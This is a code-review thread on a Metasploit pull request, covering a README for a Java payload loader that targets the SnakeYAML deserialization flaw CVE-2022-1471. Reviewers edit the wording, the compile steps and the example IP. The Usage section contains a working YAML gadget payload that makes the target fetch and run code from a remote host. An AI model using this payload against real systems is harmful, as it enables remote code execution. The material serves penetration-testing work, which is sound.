Add Exploit For CVE-2023-43654 (PyTorch TorchServer SSRF + Deserialization RCE) (#18427)
rapid7/metasploit-framework: external/source/exploits/CVE-2022-1471/README.md

# Overview

> The Java file contained within will load and execute a Metasploit payload. It's intended to be loaded while exploit

Reviewer: ```suggestion
The Java file contained within will load and execute a Metasploit payload. It's intended to be loaded as part of the exploit for
```

# Overview
The Java file contained within will load and execute a Metasploit payload. It's intended to be loaded as part of the
exploit for CVE-2022-1471 which is a YAML deserialization vulnerability within the snakeyaml project.

See https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in for more information.

## Compiling

> Compile the Java source file using `javac -cp path/to/metasploit-payloads/data/java MyScriptEngineFactory.java`.

Reviewer 2: Maybe add a line about how to generate the `data` directory as well, that references [Building the Java and Android Meterpreter](https://github.com/rapid7/metasploit-payloads/blob/master/java/README.md#building-the-java-and-android-meterpreter)?
```suggestion
Compile the Java source file using `javac -cp path/to/metasploit-framework/data/java MyScriptEngineFactory.java`.
```

# Overview
The Java file contained within will load and execute a Metasploit payload. It's intended to be loaded as part of the
exploit for CVE-2022-1471 which is a YAML deserialization vulnerability within the snakeyaml project.

See https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in for more information.

## Compiling
It's necessary to specify the Metasploit Payloads data directory as the class path when compiling the code. See the 
[metasploit-payloads][1] repository for instructions on how to compile the main Java payloads and install the data
files.

Compile the Java source file using `javac -cp path/to/metasploit-framework/data/java MyScriptEngineFactory.java`.

## Usage
Trigger the deserialization using the following YAML:
```yaml

> !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://1.1.1.1:8080/"]]]]

Reviewer 3: Maybe an alternative IP.

> !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://1.1.1.1:8080/"]]]]

Reviewer 4: https://en.wikipedia.org/wiki/Reserved_IP_addresses
